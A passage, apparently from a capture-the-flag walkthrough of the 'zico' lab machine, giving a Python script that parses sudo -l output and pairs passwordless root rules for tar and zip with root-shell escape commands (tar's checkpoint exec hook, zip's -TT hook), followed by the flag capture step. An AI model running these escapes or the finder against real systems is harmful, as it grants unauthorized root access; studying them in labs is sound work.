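The step that matters in 4.2 is reading sudo -l correctly: who the command runs as, whether a password is needed, and whether the rule pins arguments (sudo refuses extra options if it does). The Python below is an added example, not code from the original post: it parses sudo -l output into rules and pairs each root-capable tar or zip rule with the escape the walkthrough uses. The sudo -l sample is constructed to match what the post shows for zico; the escape commands come from the GNU tar manual's checkpoint actions and Info-ZIP's -TT test hook, both referenced above.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample in the shape of `sudo -l` output; the two rules match what
# the post shows for zico (tar and zip runnable as root without a password).
SAMPLE_SUDO_L = """\
Matching Defaults entries for zico on zico:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User zico may run the following commands on zico:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
"""

# Escapes that use each binary's own documented hook for running an external
# command: tar's --checkpoint-action=exec and zip's -TT (the command used to
# test the archive in place of "unzip -t"). {bin} becomes the exact path from
# the sudoers rule, because sudo matches the command by that path.
ESCAPES = {
    "tar": "sudo {bin} -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
    "zip": "sudo {bin} /tmp/x.zip /etc/hosts -T -TT '/bin/sh #'",
}

# "(root) NOPASSWD: /bin/tar" or "(ALL : ALL) NOPASSWD: SETENV: /usr/bin/zip, /bin/tar"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Turn the 'may run the following commands' block of `sudo -l` into rules."""
    rules: List[Dict[str, object]] = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = RULE.match(line) if in_cmds else None
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()   # "(root)" or "(ALL : ALL)"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags,
                          "cmd": cmd.strip()})
    return rules


def find_escapes(rules: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Pair every root-capable rule for a known binary with its escape command."""
    hits: List[Tuple[str, str]] = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        parts = str(r["cmd"]).split()
        if len(parts) != 1:
            continue        # arguments are pinned in sudoers; extra options would be refused
        name = os.path.basename(parts[0])
        if name in ESCAPES:
            hits.append((name, ESCAPES[name].format(bin=parts[0])))
    return hits


if __name__ == "__main__":
    for name, cmd in find_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        print(name, "->", cmd)
```

The tar escape can be checked without sudo on any box with GNU tar by swapping /bin/sh for something harmless such as touch /tmp/marker; if the marker appears, the checkpoint hook runs commands and the only thing sudo adds is the uid.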
5 - CAPTURING THE FLAG
- Inside the /root folder we can read the file flag.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP6ZMZFDM0hq42NZf8YVYFY7u4Omi4R3FMAnxYoTNf_PVznPrUygM4zr0GZLVRwpqZAOQZBho2f5vPN3d-DeuUYyS5Z-hXQf4L-C4vJyd4A1xhKRWiqbLl99tgu9vDVDy2FAPpaeGN4qgT/s1600/screenshot.26.jpg)